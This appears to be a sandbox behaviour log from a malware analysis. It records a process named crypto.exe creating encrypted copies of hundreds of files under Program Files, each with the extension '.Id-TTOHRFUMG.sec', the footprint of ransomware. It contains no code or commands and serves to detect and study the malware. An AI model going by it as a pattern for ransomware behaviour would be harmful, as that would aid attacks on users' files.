File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00255_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00068_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\STSLISTI.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\720_480shadow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_down.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\GRAPH.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PTXT9.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152622.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153307.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\CAN.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.InfoPath.Client.Internal.CLRHost.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ContactSelector.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.BusinessData.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Microsoft.Office.BusinessData.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscale_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BORDERBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Assets.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195384.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN097.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AssemblyInfoInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099186.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\PABR.SAM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\ARROW.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\STUBBY1.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_hi.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ACCDDSLM.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART11.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CATALOG.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTORE_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\TYPE.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Blog.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\freebl3.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\RemoveResume.asp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-settings.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-util.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\title_trans_notes.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02862_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ky.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SOCIALCONNECTORRES.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\WSS\1100.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\THANKS.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\JoinStop.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Niue.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00448_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105338.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02407_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\ne.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsPrintTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETLG.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\WMPMediaSharing.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200616092700.pma.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341475.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00018_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21325_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Chagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\Part\List.accdt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0185604.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL027.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\MSOHEV.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR34F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02791_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageBlank.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\JUDGESCH.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR13F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR47F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00828_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02067_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSRETRO.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00602_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21330_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\validation.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143743.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\utilityfunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341455.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\BG_ADOBE.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-templates.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0090386.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL103.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SHAREPOINTPROVIDER.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143748.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\CONTACTL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECRECL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKACCS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00935_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR18F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SessionOwner.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_splitter\libclone_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\MEIPreload\manifest.json.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00015_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GROOVE_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_increaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\WMPDMCCore.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\messageboxerror.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\jvm.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\APA.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMV12\Microsoft.Office.InfoPath.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB5A.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\bdcmetadataresource.xsd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\msvcr100.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\jawt.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00334_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR22F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ONLINE.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSO0127.ACL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-services.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0195534.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14845_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115855.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_bridge_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD02161_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\RSSITEM.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PG_INDEX.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc.Id-TTOHRFUMG.sec	crypto.exe
